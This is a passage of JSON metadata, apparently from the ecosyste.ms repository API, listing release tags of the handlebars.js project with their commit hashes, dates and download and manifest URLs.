Fhandlebars.js/tags/v4.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.4/manifests"},{"name":"v4.3.3","sha":"e4738491b3e8db97aa9b4f9967f04093ceba1a1f","kind":"tag","published_at":"2019-09-27T05:46:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.3/manifests"},{"name":"v4.3.2","sha":"2357140c68d17cb4f8ab74431e8737de6b4b39b5","kind":"tag","published_at":"2019-09-26T21:58:48.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.2/manifests"},{"name":"v4.3.1","sha":"050cca0866b3496852d9b198141807c32e4dae81","kind":"tag","published_at":"2019-09-24T22:32:32.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.1/manifests"},{"name":"v4.3.0","sha":"a89081d440a9da9f3f25835f47de837907b0094a","kind":"tag","published_at":"2019-09-24T06:04:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.0/manifests"},{"name":"v4.2.1","sha":"fff3e40402c9f9cd790984560658646a26e1c930","kind":"tag","published_at":"2019-09-20T17:40:48.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.2.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.1/manifests"},{"name":"v4.2.0","sha":"164c7ceea4ce074f70f2fefeba81e2e551757ea6","kind":"tag","published_at":"2019-09-03T19:58:07.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.2.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.0/manifests"},{"name":"v4.1.2-0","sha":"f98c6a54256fec0b36ae1adc4c36ab5412ca3b88","kind":"tag","published_at":"2019-08-25T16:06:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.2-0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.2-0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2-0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2-0/manifests"},{"name":"v3.0.7","sha":"55e4d9d80d5dd834fcf53c528e7e0aa080f315a5","kind":"tag","published_at":"2019-06-30T08:53:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.7/manifests"},{"name":"v4.0.14","sha":"272362e44c66d0110a4c98c7c1d121971ce447a7","kind":"tag","published_at":"2019-04-13T14:39:19.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.14","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.14/manifests"},{"name":"v4.1.2","sha":"10b5fcf92e6f3ddcbcec93c05c00cfdbb2e8d303","kind":"tag","published_at":"2019-04-13T14:19:22.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"f691db546e7563e1db3437d5a72f478f9e556714","kind":"tag","published_at":"2019-03-16T21:28:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.1/manifests"},{"name":"v4.0.13","sha":"9d4fff19d438a390b4e34d0a175b2de5f196cea8","kind":"tag","published_at":"2019-02-07T10:26:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.13","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13/manifests"},{"name":"v4.1.0","sha":"7caca944b1ae64b5bc11cba67d21e4b51ba6196a","kind":"tag","published_at":"2019-02-07T09:46:32.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.0/manifests"},{"name":"v4.0.13-beta.0","sha":"616f8c6fdb8b4224e5ab742e0ae400cfbc74086f","kind":"tag","published_at":"2019-02-02T20:26:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.13-beta.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.13-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-beta.0/manifests"},{"name":"v4.0.13-0","sha":"0e56659f7bc9d5060bf791d58fd57c5f9a82ae17","kind":"tag","published_at":"2019-02-02T20:25:22.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.13-0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.13-0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-0/manifests"},{"name":"v3.0.6","sha":"5a427d2d2b7264a83ca6702fddf63a6c7ba281c4","kind":"tag","published_at":"2019-01-02T09:17:56.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.6/manifests"},{"name":"v3.0.5","sha":"64254b604b9d7fdf76d40b9c6675326eb4bda42b","kind":"tag","published_at":"2018-12-15T13:16:13.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.5/manifests"},{"name":"v3.0.4","sha":"698c8a93a4066937977503d338bcd3b90d5035ca","kind":"tag","published_at":"2018-12-15T12:55:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.4/manifests"},{"name":"v4.0.12","sha":"8d22e6f501dc0720fe0610bb4dab60cae18e7d20","kind":"tag","published_at":"2018-09-04T18:44:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.12","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.12/manifests"},{"name":"v4.0.11","sha":"1e954ddf3c3ec6d2318e1fadc5e03aaf065b2fbd","kind":"tag","published_at":"2017-10-17T20:52:25.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.11","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.11/manifests"},{"name":"v4.0.10","sha":"670ec6fafbf99986a70074a37f73d41bad60b083","kind":"tag","published_at":"2017-05-21T12:11:27.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.10","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.10/manifests"},{"name":"v4.0.9","sha":"5ec78a8c70ac674f39a8408e04d59bd40340f6fe","kind":"tag","published_at":"2017-05-21T11:39:05.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.9","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.9/manifests"},{"name":"v4.0.8","sha":"fed5818876ec325b2b48a61395fe0089bdda05e8","kind":"commit","published_at":"2017-05-02T20:55:44.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.8/manifests"},{"name":"v4.0.7","sha":"606fa55b0a2fab4b22b810a21fc9ae1fd5fd8430","kind":"tag","published_at":"2017-04-29T20:52:09.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.7/manifests"},{"name":"tmp-1252-backup","sha":"ee913e28bd34dc6e97f98a99f00b484195f72d6f","kind":"commit","published_at":"2017-01-02T09:13:49.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/tmp-1252-backup","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/tmp-1252-backup","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/tmp-1252-backup","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/tmp-1252-backup/manifests"},{"name":"v4.0.6","sha":"ad3037cf54132fc5f589134d3bef961a5f751973","kind":"commit","published_at":"2016-11-12T18:32:45.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.6/manifests"},{"name":"v4.0.5","sha":"205c61cfb1acdb599bbdfcf2d356641254e09e5c","kind":"tag","published_at":"2015-11-20T05:06:54.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.5/manifests"},{"name":"v4.0.4","sha":"b7c95e9feb9b641af2fe83b23c3341ec624aae80","kind":"tag","published_at":"2015-10-29T06:54:17.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"9365b8290070f34bf797c836aed4335ce6a4094f","kind":"tag","published_at":"2015-09-24T03:41:14.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"a5a3ab01d3659b996234e3fa5a4a32350a145096","kind":"tag","published_at":"2015-09-04T14:13:16.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"c7b28a65dab1f1bb370f258fd65796d74c7b53cb","kind":"tag","published_at":"2015-09-03T02:21:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"bff5fab8f9d42e21950be00dcf1cedf4dc1a565b","kind":"tag","published_at":"2015-09-01T13:19:14.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.0/manifests"},{"name":"v3.0.3","sha":"891f48b7e9c321dd9cbe7a898533eb6b2434b8a0","kind":"tag","published_at":"2015-04-28T19:52:04.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.3/manifests"},{"name":"v3.0.2","sha":"2f0b86665f6080c065d67182ccfdca2ce6f243fa","kind":"tag","published_at":"2015-04-20T08:11:12.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.2/manifests"},{"name":"v3.0.1","sha":"afe730e0594440dd17fdc43271fc4a7db19327f3","kind":"tag","published_at":"2015-03-24T19:22:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.1/manifests"},{"name":"v3.0.0","sha":"0099e16a01bae4789c3560e2a658fdd7fecc9e12","kind":"tag","published_at":"2015-02-10T06:14:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.0/manifests"},{"name":"v2.0.0","sha":"1eb2b04aa1468059172af16968e28ba3a9c07e6d","kind":"tag","published_at":"2014-09-02T02:28:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0/manifests"},{"name":"v2.0.0-beta.1","sha":"cee52ea68f85baf6812cbc6d303595a88b4ea4f8","kind":"tag","published_at":"2014-08-26T23:32:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-beta.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-beta.1/manifests"},{"name":"v2.0.0-alpha.4","sha":"efad61b1b72a487c087f57ba85287f5682e57280","kind":"tag","published_at":"2014-05-20T04:15:51.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.4/manifests"},{"name":"v2.0.0-alpha.3","sha":"f419838362ad6f3a6f10179bcd7ca683d527e030","kind":"tag","published_at":"2014-05-20T03:29:25.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.3/manifests"},{"name":"v2.0.0-alpha.2","sha":"04c312649b0b9c61a245c4928f230935e9b8dd23","kind":"tag","published_at":"2014-03-06T07:26:26.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.2/manifests"},{"name":"v2.0.0-alpha.1","sha":"a5ff1f3d22178b3889983be29b31b850a4528719","kind":"tag","published_at":"2014-02-19T23:49:09.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.1/manifests"},{"name":"v1.3.0","sha":"0c6829f8af189622afd726bb72c195b5323bd6f9","kind":"tag","published_at":"2014-01-02T04:10:31.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.3.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"1c0614bd88b835b7cdfe1fb7f39650c18f645763","kind":"tag","published_at":"2013-12-26T22:25:42.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.2.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"096b8ccd2e376d621fd281e08d557a4632188aaa","kind":"tag","published_at":"2013-12-24T03:39:46.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.2.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.0/manifests"},{"name":"v1.1.2","sha":"47d13cb23c968ada3878b8bacf2813fb01758475","kind":"tag","published_at":"2013-11-06T00:10:06.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.1.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.2/manifests"},{"n